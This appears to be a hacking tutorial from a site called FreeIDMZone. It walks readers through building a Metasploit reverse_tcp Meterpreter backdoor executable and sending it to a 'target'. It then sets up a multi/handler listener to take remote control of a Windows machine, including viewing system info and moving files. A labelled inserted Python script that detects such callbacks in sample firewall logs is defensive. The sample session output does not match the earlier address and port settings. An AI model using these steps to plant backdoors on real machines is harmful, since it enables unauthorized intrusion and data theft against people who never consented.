Hacking Windows Users with Metasploit
Hi, welcome to FreeIDMZone
Have you ever wanted to hack someone else's computer? If yes, well, I'm here to help you. In this guide we are going to hack any Windows user by using the Metasploit Framework. Before we proceed, please read and understand these terms first.
Metasploit
A computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Exploit
An exploit is the means by which an attacker, or pentester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended. Common exploits include buffer overflows, web application vulnerabilities (such as SQL injection), and configuration errors.
Payload
A payload is code that we want the system to execute and that is selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that "binds" a command prompt to a listening port on the target machine, which the attacker can then connect to. A payload could also be something as simple as a few commands to be executed on the target operating system.
Meterpreter
An advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Requirements
- Pentesting Operating System (I recommend Kali Linux)
- Metasploit Framework (Already installed in most Security OS)
- Basic knowledge
Preparing the Backdoor
- Open up your terminal and type in this command:
root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=88 X > backdoor.exe
- Once the process has completed, send the backdoor to your target.
Explanation
The command sets the payload for our backdoor to reverse TCP for Windows. LHOST and LPORT are the IP address and port you want the victim to connect back to. Set LHOST to your IP address on the LAN (Local Area Network), not your public/external IP address. You can look up your IP by typing ifconfig into the terminal. If you want to target people on the WAN (Wide Area Network)/Internet you need to port forward first, and then you can use your public/external IP address. Don't forget, the LPORT number is up to you; any number works as long as the port is not already in use by another service. (Note that msfpayload has since been retired in favour of msfvenom in current Metasploit releases.)
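Because the reverse TCP payload makes the infected machine open the connection outward to LHOST:LPORT, and LPORT can be any free port, a defender cannot rely on a fixed port signature to spot it. The following Python script is an added example, not part of the original guide: it scans constructed host-firewall log lines (the log format, the 192.168.1.x addresses and the server inventory are all assumptions) and flags outbound connections to a LAN peer that is not a known server when the originating program runs from a user-writable folder.

```python
import ipaddress
import re

# Constructed host-firewall log lines for this example; the format is assumed, not a real product's.
SAMPLE_LOG = """\
2015-07-18 10:01:12 OUT TCP 192.168.1.7:49280 -> 192.168.1.2:88 image=C:\\Users\\bob\\Downloads\\backdoor.exe
2015-07-18 10:01:15 OUT TCP 192.168.1.7:49281 -> 93.184.216.34:443 image=C:\\Program Files\\Mozilla Firefox\\firefox.exe
2015-07-18 10:02:03 OUT TCP 192.168.1.7:49282 -> 192.168.1.10:445 image=C:\\Windows\\System32\\svchost.exe
2015-07-18 10:03:40 OUT TCP 192.168.1.7:49283 -> 192.168.1.2:4444 image=C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) OUT TCP (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) image=(?P<image>.+)$"
)

# Assumed inventory of LAN servers a workstation is expected to talk to: (address, port).
KNOWN_LAN_SERVICES = {("192.168.1.10", 445), ("192.168.1.1", 53)}

# Folders a normal user can write to; binaries launched from here deserve more scrutiny.
USER_WRITABLE_RE = re.compile(
    r"\\Users\\[^\\]+\\(Downloads|Desktop|AppData\\Local\\Temp)\\", re.IGNORECASE
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def is_suspicious(rec):
    """Reverse-shell heuristic: a user-writable binary opening an outbound TCP
    connection to a private (LAN) address that is not a known server.
    The destination port is deliberately ignored, since LPORT is arbitrary."""
    if not ipaddress.ip_address(rec["dst"]).is_private:
        return False
    if (rec["dst"], int(rec["dport"])) in KNOWN_LAN_SERVICES:
        return False
    return bool(USER_WRITABLE_RE.search(rec["image"]))


def find_suspicious(log_text):
    """Return (dst, dport, image) for every line that trips the heuristic."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_suspicious(rec):
            hits.append((rec["dst"], int(rec["dport"]), rec["image"]))
    return hits


if __name__ == "__main__":
    for dst, dport, image in find_suspicious(SAMPLE_LOG):
        print(f"ALERT outbound to {dst}:{dport} from {image}")
```

On the constructed log the browser's HTTPS session and the file-server connection pass, while both callbacks from binaries in the user's profile are reported regardless of the port chosen.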
Prepare to Attack
- Once again, open another terminal and type these commands:
root@kali:~# service postgresql start
root@kali:~# service metasploit start
- Or you can start the service directly by going to Application > Kali Linux > System Services > Metasploit > Start
- After the initialization process has completed, type msfconsole in the terminal. This will take a moment.
- Type in these commands:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST your_ip_here
msf exploit(handler) > set LPORT your_port_here
msf exploit(handler) > exploit
Explanation
As you can see, service postgresql start and service metasploit start simply start the services. The commands use exploit/multi/handler and set PAYLOAD windows/meterpreter/reverse_tcp mean that we are going to use the Metasploit handler with the same payload we used to make our backdoor earlier. If you type show options, you will see that LHOST and LPORT are not set correctly yet. That's why we need to set LHOST and LPORT again to the IP address and port we used previously for our backdoor. Exploit? I hope you know what that command does.
Attacking
- Let's say we have hit a target; you will then see this come out in your terminal:
[*] Started reverse handler on 162.198.37.130:86
[*] Starting the payload handler …
[*] Sending stage (769024 bytes) to 162.198.37.134
[*] Meterpreter session 1 opened (162.198.37.130:86 -> 162.198.37.134:49280 at 2015-07-18
meterpreter>
- Once it says "Meterpreter session opened", you can now do anything you like. For example, to see the victim's system info, simply type sysinfo in the terminal.
- You can also download and upload files from/to the victim's PC.
- For more commands, type help and you will see a bunch of commands.
That's all, hope this helps!
Screenshots
Enjoy, and don't forget to like us!